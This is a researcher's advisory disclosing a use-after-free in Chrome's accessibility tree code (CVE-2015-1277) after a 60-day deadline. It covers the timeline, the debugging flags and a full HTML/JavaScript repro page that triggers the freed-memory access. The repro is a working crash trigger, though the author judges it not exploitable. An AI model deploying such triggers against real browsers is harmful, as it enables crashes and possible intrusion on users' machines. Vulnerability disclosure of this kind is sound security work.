2015-07-17

1503A - Chrome - ui::AXTree::Unserialize use-after-free (CVE-2015-1277)

TL;DR
After 60 day deadline has passed, I am releasing details on an unfixed use-after-free vulnerability in Chrome's accessibility features, which are disabled by default. The issue does not look exploitable.

Details
On April 22nd 2015 I reported a use-after-free vulnerability in Google Chrome to the Chromium issue tracker. I allow vendors 60 days to fix an issue, unless they can provide an adequate reason for extending this deadline. The issue was marked fixed on June 3rd but unfortunately the fix has not yet been shipped as of July 17th. Since the deadline for a fix has passed some time ago without adequate explanation, I am disclosing details about the vulnerability today.

To cause the use-after-free to trigger an access violation in a debugger, Chrome must be run with page heap enabled, the "--force-renderer-accessibility" and "--no-sandbox" command line flags, and the environment variable "CHROME_ALLOCATOR" set to "winheap". Without the page heap settings, the repro should still trigger the use-after-free but will probably not cause an no access violation, as memory with valid data will still be allocated at the address of the freed memory.


Repro
<html>
  <head>
    <script>
      window.onload = function () {
        setTimeout(function() {
          document.getElementById("style")
              .appendChild(document.createElement("x"));
          document.getElementById("x")
              .appendChild(document.createElement("frame"));
        }, 0);
      };
    </script>
  </head>
  <body>
    <style id="style">
      @import "404";
      body {
        float: left;
      }
    </style>
    <x id="x">
      x
    </x>
  </body>
</html>